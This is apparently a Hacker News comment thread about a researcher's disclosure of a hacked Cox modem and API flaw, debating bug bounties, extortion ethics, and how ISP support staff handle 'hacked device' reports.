agreed, lets hope they dont bloody sue him into the ground for "hacking"
Its stuff like this that company's should REWARD people for finding.
I assumed they offered a bounty for bug disclosure? You mean to tell me that an internet provider with 11 billion in revenue can't pay someone that found a bug impacting all their clients?
Frankly he could have just sold the vulnerability to the highest bidder
Why? Ethics aside, is everything money?
Ethics aside, why not? That's why we have ethics.
Because even if I remove ethics, I can't find a reason for doing something like that.
For me, doing the right thing is beyond all these things, and I don't care about money beyond buying the necessities I need.
That...is ethics, no?
Ethics and character, yes, and an attitude towards life that doesn't regard money as the deeper meaning of everything.
Ethics aside, what is characterful about saying no to money? Should I say no to my salary for character reasons?
There's a difference between doing your job and earning money as a result vs. finding keys to someone's house and selling said keys to the highest bidder.
Yes: ethics.
Some of us can get there without the organized principles simply with empathy. It's even deeply selfish in it's own way.
Ethics is our answer for those that can't.
Money often starts out as necessity or one of it's close cousins. If I were 1) 8k miles away from my target, 2) in a region with more internet access than employment prospects and 3) needed to eat, I can see a path to profitable disclosure.
This can be a luxury. After a year or 3 of kids in and out of hunger, what's right can get reframed.
Getting beyond that is the thing.
Vendors who pay bounties often restrict public disclosure, and the professional value obtained from being able to talk about the research you do may be worth significantly more than the payout
Professional value that doesn't translate into money, do you mean? How do you categorise that?
I take the "professional value" to mean essentially putting it on your resume, gaining publicity by blogging about it, getting conference organizers to let you give a talk about it, etc., all of which may ultimately increase the money you can earn doing computer security.
Ethics aside, there are many thing that move people, and it's not always money. For instance, selling the vulnerability means the author wouldn't have been able to tell their story.
because money grants wishes, and having more money means you get more of your wishes granted.
That doesn't make me interested. I don't get all excited about the things money can buy.
Edit: As I noted elsewhere, necessities are something else.
I would love to have the money (42k EUR) to buy Scewo, which is an advanced self balancing stair climbing wheelchair. Sadly enough, I doubt I will ever be able to.
May I suggest a decade of red state hunger-level poverty? My kids and I did it. Three years out of it, I get excited paying utilities on time.
Wait till you hear about buying governments.
So this security researcher can keep doing his research without worrying about paying bills. The company gets cheap security audit, the researcher gets money, everybody wins
This attitude is why "independent security researchers" offering to present unsolicited findings to companies in exchange for payment feels exactly like extortion.
At the same time, Cox is a commercial entity that makes money by providing services. Cyberattacks make them lose money, so it's only fair for them to financially award people that responsibly inform them of vulnerabilities instead of easily and anonymously selling those.
We're not talking about a grandma losing her wallet with 50 bucks in it and not giving money to the guy that found it and gave her back.
Yes, Cox has that choice. But, what you're describing is the definition of extortion. The fact that it's easy for people to get away with it does not make it ethical.
It's not the definition of extortion. If I walk past a business and notice the locks on their windows are rusted and I happen to be a lock guy and say hey, I noticed your locks are fucked, I'd be happy to consult for you and show you how and why they are broken, that's just doing business. Extortion is telling them, hey, your locks are fucked and I'm telling everyone unless you pay me. It requires a threat.
You just manufactured a completely different scenario.
The comment I responded to was this:
That comment includes the threat ("instead of easily and anonymously selling those").
So, yes. That is the definition of extortion.
I think preventing people from having that incentive vs an actual threat are not the same, which is how I read the hypothetical.
The following two sentences read the same to me:
"To remove my incentive to harm you, you should pay me".
"To remove my incentive to share information with others who may harm you, you should pay me".
And, the threat is pretty clear IMO.
Do you not lock your doors because you feel you shouldn't have to worry about people stealing your stuff because it's morally wrong to steal or do you do it to mitigate risk? Suggesting someone should mitigate potential risk is all we are talking about.
You're making a different argument now.
https://news.ycombinator.com/item?id=40577683
Great response, entirely agree.
At the end of the day your enemy has no ethics, and we share the public internet with enemies. If paying to find security flaws means it's more likely people will find your flaws rather than sell them to someone that will use them for nefarious means then it is the better bet.
Making an argument for what's practical and what's ethical are two different things. My comment was about the latter. Yours appears to be about the former.
Ransomware victims have sometimes found it practical to pay the ransom. They're still victims of extortion.
while beg bounty people can be annoying, you have to remember that people aren't obligated to sit down and find free bugs for any company (especially not a big one) - why would i sit down and look at some code for free for some giant corp when i could go to the beach instead?
No, they aren't obligated. So, if there's no bug bounty program in place, then they should either go to the beach or be willing to find bugs for the public good.
The idea that the company owes them anything for their unsolicited work is misguided. And, if they present the bugs for money under the implicit threat of selling the information to people who would harm the company, then it's extortion.
I would agree with everything you said, If we ignore the fact that the company has billions of dollars in revenue and paying a bug bounty is a drop in the ocean for them.
Do you think it's reasonable to say the the ethics of what you call "extortion" should depend with how big the company is? I'm obviously not advocating for making a small company pay more than they can manage
That framing is strange to me. If they want to offer a bug bounty, then they can. But, it's their choice. Maybe they'd instead rather engage a security firm of their own selection.
But, whatever the case, to say "they should pay the money because they can afford to" isn't right to me. I don't believe the definition of extortion changes based on how big the target is or whether it can afford to pay.
In fact, the line of thinking in some of the comments here is so far off from what seems obviously ethical to me that I've had to re-read a few times to ensure that I'm not missing something.
1. Companies are amoral entities, and given the opportunity have few qualms about screwing people over if they can profit from it. Why do you expect people to behave ethically towards entities that most likely won't treat them ethically?
2. If said person doesn't present the bug to the company, but just goes straight to selling it to the highest bidder it's not extortion. If the company does not provide the right incentives (via e.g. bug bounties), isn't it their own fault if they get pwnd? They clearly don't value security.
You seem to be saying it's essentially "justified extortion" and not immoral because you've adjudicated them guilty. We disagree.
Not to mention them getting "pwnd" creates a lot of collateral damage in the form of innocent customers.
They do not:
https://www.cox.com/aboutus/policies/cox-security-responsibl...
Mh, we have a similar thing on our website at work, but people who found serious issues still got compensated.
One big reason to put this out there: Otherwise you get so many drive-by disclosures. Throw ZAP at the domain, copy all of the low and informational topics into a mail at security@domain and ask for a hundred bucks. Just sifting through that nonsense eventually takes up significant time. If you can just answer that with a link to this statement it becomes easier.
It makes me a bit sad that this might scare off some motivated, well natured newbs poking at our API, but the spam drowned them out.
Don’t frame a company not parting ways with money that they could hypothetically part ways with as being unusually egregious. That’s never how it works. Not every conversation needs overstated outrage.
Yeah let’s hope that they don’t prosecute him under the CFAA. He saved the FBI and untold others. He’s a hero.
They have a pretty good looking responsible disclosure program which I’m assuming he checked first - it’d be surprising for someone who works in the field not to have that same concern:
https://www.cox.com/aboutus/policies/cox-security-responsibl...
It's hard to imagine, but I wish they would have taken advantage of him walking in with the compromised device in the first place.
I once stumbled upon a really bad vulnerability in a traditional telco provider, and the amount of work it took to get them to pay attention when only having the front door available was staggering. Took dedicated attempts over about a week to get in touch with the right people - their support org was completely ineffective at escalating the issue.
Cox's support organization was presented with a compromised device being handed to them by an infosec professional, and they couldn't handle it effectively at all.
He probably should have gone the responsible disclosure route with the modem too. Do you really expect a minimum wage front desk worker to be able to determine what’s a potential major security flaw, and what’s a random idiot who thinks his modem is broken because “modern warfare is slow”?
I would expect a front-desk worker to be trained to escalate issues within the org, and supported in doing so.
Have you ever worked as a front-line support agent? I'm guessing not. I have many years ago, and for an ISP too. If I bought an Amazon share back then for every time a customer called support because they were "hacked", I'd not be posting here during a boring meeting because I'd own my own private island.
The two best conversations I can recall were when we changed a customer's email address about a half dozen times over a year because "hackers were getting in and sending them emails" (internal customer note: stop signing up for porn sites), and a customer's computer could barely browse the web because they were running about 5 software firewalls because they were "under surveillance by the NSA" (internal customer note: schizophrenia).
The expected value of processing requests like this any way other than patting the reporter on their head and assuring them the company will research it, then sending them along their way with a new device while chucking the old one in the "reflash" pile isn't just zero, it's sharply negative.
The author's mistake was not posting somewhere like NANOG or Full-Disclosure with a detailed write-up. The right circles would've seen it, the detailed write-up would've revealed that the author wasn't an idiot or paranoid, and the popped device might've been researched.
This is an organizational equivalent of a code smell. Something is off when support people aren't writing up the anomalies and escalating them.
Some of the most serious security issues I've ever had to deal with started with either a sales rep getting a call or a very humble ticket with a level one escalating it up. Problem is for every serious security issue that gets written up, forty-two or so end up getting ignored because the support agent is evaluated on tickets per hour or some other metric that incentivizes ignoring anything that can't be closed by sending a knowledge base article.
"Code smell" as a programming term is often a red herring that causes conflicts within development teams (I've seen this happen too many times), because anyone can call anything they don't like about a coworkers code as a "code smell". Your comment is a "code smell". See how easy that was?
And "code smell" doesn't apply in a similar or metaphorical way towards cable modem support personnel. Those people aren't supposed to know how to escalate a case of a customer bringing in suspected hacked modem. If they did that for every idiot customer that brought in a "suspicious" modem, the company's tech support staff wouldn't be able to get anything done. 99.999999999999% of the cases would not in fact be a hacked modem, so there really shouldn't be any pathway to escalate this as a serious issue.
I’ve been in this industry for 15 years and I’ve never had to deal with the code smell situation, in that I don’t use that term and I’ve never interacted with anyone at work who uses that term.
I think after reading this I’ll continue that habit. Putting the phrase “code smell” in a review is like using the dark side of the force: you’re just being an ass
What is described in the article is a fantastic hack. Given my organization's structure and skills, you'd need to send it straight past three layers of support and several layers of engineering before you find someone who'd be able to assemble a team to analyze the claims. We'd spend four figures an hour just to confirm the problem actually exists - then we'd all go "oh shit, how do we get in touch with the FBI, because this is miles above our paygrade."
An average cable internet user walks into a retail ISP location, sets a cable modem on the counter, and says "this is hacked". What is the probability you'd assign to them being correct? How much of your budget are you willing to spend to prove/disprove their theory? How often are you willing to spend that - remembering Cox has 3.5 million subscribers.
Friction is good. Hell, it's underrated! Introduce it to filter out fantastic claims: the stupid and paranoid are ignored quickly, leaving the ones that make it through as more likely to be real.
You can tell exactly from the responses in this thread who has dealt with the general public in a support role, and who hasn't.
I haven't even dealt with the general public in a support role but I have enough examples just in my, not very large, social circle.
The aunt who is convinced she has a stalker who is hacking all her devices and moving icons around and renaming files to mess with her (watching her use the computer, she has trouble with clicking/double-clicking and brushing up against the mouse/trackpad. call her out on it, she says she didn't do it)
The coworker who was a college football player, who now has TBI-induced paranoia. He was changing his passwords about 3 times a day. Last thing I heard about him before he got cut out of my social circle was he got in a car accident because he was changing his password while he was driving.
Meanwhile I know zero people who have found any real vulnerabilities.
I have escalated customer security issues while working as a support agent. I have also found and been paid what could be considered a bounty (in the form of a bet made by the lead dev to another person) while working support.
Admittedly, this is anecdotal, and it was a small company, and my skillset was being very underutilized at the time. However, I don't think it's hard to imagine a me that would have been closed minded enough to normalize my experiences and expect it of others. In fact, I'd say I still fight with it regardless of having seen it.
If the man wanted the router back, they should'a given the router back.
Where's the lie? We all are.
We really need to work on this definition of "expect". It's expected from them to have such training but we know that in practice that is not what happens. So we "expect" they to be trained, but what we "expect" will happen in practice is very different.
Every third person who comes in has their router hacked, that's the problem. We know that Sam is good at what he does and to not be wrong about this, but Cox can't rely on everyone being that good, nor on their very poorly paid front-desk worker to have the ability to tell if they are an idiot or a expert.
Source: was a volunteer front-desk person at a museum. Spent a lot of my life dealing with people. They were sure of incorrect things all the time and could not be relied on to know.
In retrospect, Sam should definitely have hit the responsible disclosure page (if such a thing even existed in 2021) but I don't fault anyone for the choices they made here.
I think he was probably keen to get back on the Internet to be fair.
He wasn’t off the internet. He just determined his modem was hacked. Given it had been hacked for who knows how long, what’s one more day? They responded to his api submission in 6 hours.
I can't really blame them. The number of customers able to qualify that a device has actually been hacked is nearly zero. But do you know how many naive users out there that will call/visit because they think they've been hacked? It's unfortunately larger than the former. And that'll cost the business money. When 99.9% of those cases, the user is wrong. They have not been hacked. I say this as someone who supported home users in the 2000s. Home users that often think they'd been "hacked".
How many of those show up in person though?
Just the craziest, wrongest ones
+1 to this. Dealt with the same in consumer PC repair.
This was my experience too.
Some people truly believe the computer is hacked every time there is behaviour they didn't expect. Only the craziest, least capable ones show up to scream at you like you caused the whole thing.
yeah the false positive problem is huge here. For every legitimate security professional there are probably 10-100 schizos who believe they are “hacked”
I was mentioned in the media once for an unrelated internet protocol vulnerability and I had people contacting me about their "hacked" internet connections.
For a major cable ISP, I can't imagine how many customers walk in to replace their "hacked" boxes on a daily basis.
That is the problem. He should have contacted them like he did the second time. When he went into their shop, it all depended on that particular employee, and you can't blame that person for not recognizing the issue.
I work for a support org for a traditional telco. We have "contacts" but they're effectively middlemen.
If you dropped this in my lap, and I'm pretty savvy for a layman, I wouldn't know how to get past my single channel. I think it would require convincing the gatekeeper.
I used to run a small telco noc and if any of my guys sat on something like this rather than reporting it to me I would have turfed them.
Especially because both of the ISPs we supported insisted on using a lot of dodgy CPE.
They probably get someone in asking to change it because someone on LOL say they just hacked their computer.
I’ve often wished I could show an “I know what I’m doing” badge to support to guarantee escalation.
“I’m a three star infosec General, if I’m contacting you it’s not to waste your time.”
I have a cloned key from a spare modem that I use with my router (Unifi) to allow it to connect directly to the ONT, minimizing devices in my rack.
I’ve found that this usually confuses first line support enough that they’ll listen to me if I need them to do some specific action.
To be clear, I’m not stealing internet access or anything of the sort. I didn’t want a useless modem / AP that I’d end up bridging anyway, so I extracted a key from another one, and my router uses it to auth with my ISP.
It quickly becomes the Service Animal problem. When no one can or is allowed to verify your infosec credentials, everyone becomes a three star infosec General with a simple purchase from Amazon/Alibaba.
They were presented with some random person who wanted to get a new modern on their rental but also keep the old one, for free. They had no way of knowing if they were an actual security professional.
I've seen this across most companies I've tried reporting stuff to, two examples.
Sniffies (NSFW - gay hookup site) was at one point blasting their internal models out over a websocket, this included IP, private photos, salt + password [not plaintext], reports (who reported you, their message, etc), internal data such as your ISP and push notification certs for sending browser notifications. First line support dismissed it. Emails to higher ups got it taken care of in < 24 hours.
Funimation back in ~2019(?) was using Demandware for their shop, and left the API for it basically wide open, allowing you to query orders (with no info required) getting Last 4 of CC, address, email, etc for every order. Again frontline support dismissed it. This one took messaging the CTO over linkedin to get it resolved < a week (thanksgiving week at that).
Sounds to me like their support org was reasonably effective at their real job, which is keeping the crazies away from the engineers.
It's even harder for me to imagine them saying "Oh, gee, thanks for discovering that! Please walk right into the office, our firmware developer Greg is hard at work on the next-gen router but you can interrupt him."
it's good but the constant use of "super" was a little off-putting, "super curious", "super interesting", "super interested", etc.
There were 4 occurrences of the word "super" in an article with more than four thousand words in it, there is no need for "etc." you quoted all the occurrences since "super curious" was used twice.
I guess that reader is super sensitive.
IMHO, your comment is super nitpicky.
Super off-putting, you mean.
Totally agree, an easy read and a great reaction by Cox. I also like that the discovery and the bug itself were not communicated in a negative or condescending way, which is sometimes the case.
Completely agree. These kind of articles are always an inspiration. It’s nowhere near wholesome like the original post but I’ve tried to write in similar style before. Shameless self plug: https://blog.aydindogm.us/posts/superbox-hacks-v1/
> I'd love to read a follow up on what the bug was that intermittently permitted unauthorised access to the APIs
I would, too. Not sure we will ever learn. Maybe a load balancer config that inadvertently included "test" backends which didn't check authorization?